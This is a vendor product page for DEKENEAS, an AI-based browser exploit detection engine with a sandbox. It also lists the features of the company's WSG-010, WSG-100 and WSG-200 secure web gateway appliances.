DEKENEAS is a unique product, being the only publicly available tool able to identify with great accuracy both known and unknown browser exploits ("0day") and attacks by means of artificial intelligence algorithms instead of traditional signature scanning. Our approach is mainly focused on the detection of unknown attack vectors for the vast majority of existing desktop browsers, such as Chrome, Edge, Firefox or Safari, but also for mobile device browsers on Android and iPhone. Our artificial intelligence algorithms understand the code of the website before actually executing it, and try to determine whether the code constructs encountered are malware-specific or benign. They also try to figure out if there are special conditions for certain code to run, such as specific User-Agent strings, language settings or IP addresses. All this information is later used during the instrumentation performed by the Dekeneas Sandbox, which acts as a double check, actually executing the suspicious code in a real environment according to the special conditions requested by the analyzed code: launching a specific browser with specific language or country settings in a specific environment (desktop or mobile), and analyzing how the code interacts with the browser. In addition to code instrumentation, the Dekeneas Sandbox also analyzes the generated traffic looking for exploitation gadgets, therefore maximizing the chances of identifying unknown attacks.
- Signature-less scanning - browser malware looks different from infection to infection, so signature scanning is mostly useless
- In-depth scanning of websites - most attacks are not placed in the first page
- Code interpretation without actually executing the code - greatly optimizing analysis time
- Detection of attacks in the early stage - as opposed to traditional methods that detect the post-exploitation stage of infection
- Anti anti-analysis capabilities - most browser attacks are highly obfuscated and have anti-analysis capabilities
- Anti-evasion capabilities - most browser attacks are able to evade detection by targeting specific browsers, technologies or settings
Dekeneas On-Premise WSG
The Dekeneas WSG range is a family of secure web gateway appliances, integrating the advanced artificial intelligence malware scanning capabilities of the DEKENEAS into your network, protecting your users from some of the most elusive attacks used by hackers.
WSG-010
Virtual Appliance
- Administration interface
- Transparent Proxy (network traffic redirector, WCCP redirect)
- Explicit Proxy (supports PAC installation, WPAD server, Active Directory)
- HTTP/S inspection
- URL filtering based on DEKENEAS
- Integrated DEKENEAS engine
- Supports both IPv4 and IPv6 protocol stacks
- Supports integrations with external threat intelligence feeds, commercial or open source
- Custom and automated whitelisting of websites
- Custom and automated blacklisting of malicious websites
- Automated antivirus scanning of files in transit
- Automated updates of AV signature database
- Automated blocking of malicious files in transit
WSG-100
Hardware Appliance
- Administration interface
- Transparent Proxy (network traffic redirector, WCCP redirect)
- Explicit Proxy (supports PAC installation, WPAD server, Active Directory)
- HTTP/S inspection
- URL filtering based on DEKENEAS
- Active Directory integration (multi realm, multi forest NTLM, single sign on through browser stored credentials)
- Inline sandbox
- Bandwidth management
- Integrated DEKENEAS engine
- Supports both IPv4 and IPv6 protocol stacks
- Supports integrations with external threat intelligence feeds, commercial or open source
- Custom and automated whitelisting of websites
- Custom and automated blacklisting of malicious websites
- Automated antivirus scanning of files in transit
- Automated updates of AV signature database
- Automated blocking of malicious files in transit
- Automated YARA scanning of files in transit
- Data leakage prevention through artificial intelligence classification
WSG-200
Hardware Appliance
- High availability setup
- Administration interface
- Transparent Proxy (network traffic redirector, WCCP redirect)
- Explicit Proxy (supports PAC installation, WPAD server, Active Directory)
- HTTP/S inspection
- URL filtering based on DEKENEAS
- Active Directory integration (multi realm, multi forest NTLM, single sign on through browser stored credentials)
- Inline sandbox
- Bandwidth management
- Integrated DEKENEAS engine
- Supports both IPv4 and IPv6 protocol stacks
- Supports integrations with external threat intelligence feeds, commercial or open source
- Custom and automated whitelisting of websites
- Custom and automated blacklisting of malicious websites
- Automated antivirus scanning of files in transit
- Automated updates of AV signature database
- Automated blocking of malicious files in transit
- Automated YARA scanning of files in transit
- Data leakage prevention through artificial intelligence classification